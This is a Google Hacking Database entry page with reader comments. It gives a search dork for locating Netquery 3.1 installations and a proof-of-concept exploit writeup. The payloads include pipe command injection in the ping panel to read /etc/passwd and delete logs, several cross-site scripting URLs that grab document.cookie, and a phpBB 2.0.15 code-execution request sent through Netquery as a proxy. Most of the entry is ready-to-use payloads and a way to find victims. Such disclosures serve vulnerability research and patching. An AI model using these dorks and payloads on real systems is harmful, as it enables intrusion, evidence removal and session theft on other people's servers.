GHDB « Hackers For Charity

GHDB

GHDB

Google Search: inurl:nquser.php filetype:php

rgod rates this entry 8 out of 10.
Submitted: 2005-08-07 00:00:00
Added by: rgod
Hits: 3179
Score: 8

Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit software: author site: http://www.virtech.org/tools/ a user can execute command on target system by PING panel, if enabled like often happens, using pipe char on input text “Ping IP Address or Host Name”, example: | cat /etc/passwd then you will see plain text password file | pwd to see current path | rm [pwd_output]/logs/nq_log.txt to delete log file… disclosure of user activity: if enabled, a user can view clear text log file through url: http://[target]/[path]/logs/nq_log.txt xss: http://[target]/[path]/submit.php?portnum=”/>alert(document.cookie) http://[target]/[path]/nqgeoip2.php?step=alert(document.cookie) http://[target]/[path]/nqgeoip2.php?body=alert(document.cookie) http://[target]/[path]/nqgeoip.php?step=alert(document.cookie) http://[target]/[path]/nqports.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?body=alert(document.cookie) http://[target]/[path]/portlist.php?portnum=alert(document.cookie) a user can use on-line Netquery installations like proxy servers to launch exploit from HTTP GET request panel, example: exploiting Phpbb 2.0.15: make a get request of http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight=’.system($HTTP_GET_VARS[command].’&command=cat%20/etc/passwd

Comments:


5 Responses to “GHDB”

  1. Jack says:
    October 26, 2011 at 9:12 pm

    Does GHDB still updates for now?

  2. Johnny says:
    October 27, 2011 at 3:31 am

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:
    April 20, 2013 at 7:10 am

    Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???

  4. Johnny says:
    April 27, 2013 at 5:10 am

    The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:
    May 7, 2013 at 7:38 am

    Is any offline view-able resources is available of this product ?

Leave a Reply